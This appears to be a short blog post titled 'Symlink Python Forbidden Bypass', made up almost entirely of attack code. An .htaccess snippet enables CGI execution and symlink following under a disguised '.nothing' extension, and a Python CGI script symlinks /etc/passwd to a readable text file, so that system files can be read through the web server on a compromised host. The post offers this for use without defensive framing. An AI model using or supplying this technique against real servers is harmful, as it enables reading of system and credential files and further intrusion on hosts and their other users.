Options FollowSymLinks MultiViews Indexes ExecCGI
AddType application/x-httpd-cgi .nothing
AddHandler cgi-script .nothing
AddHandler cgi-script .nothing
#!/usr/bin/python
print "Content-type: text/html\n\n"
import os
filename = "nothing.txt" #dst
linkto = "/etc/passwd" #source
os.symlink(linkto, filename)
Symlink Python Forbidden Bypass
Views:
0 comments:
Post a Comment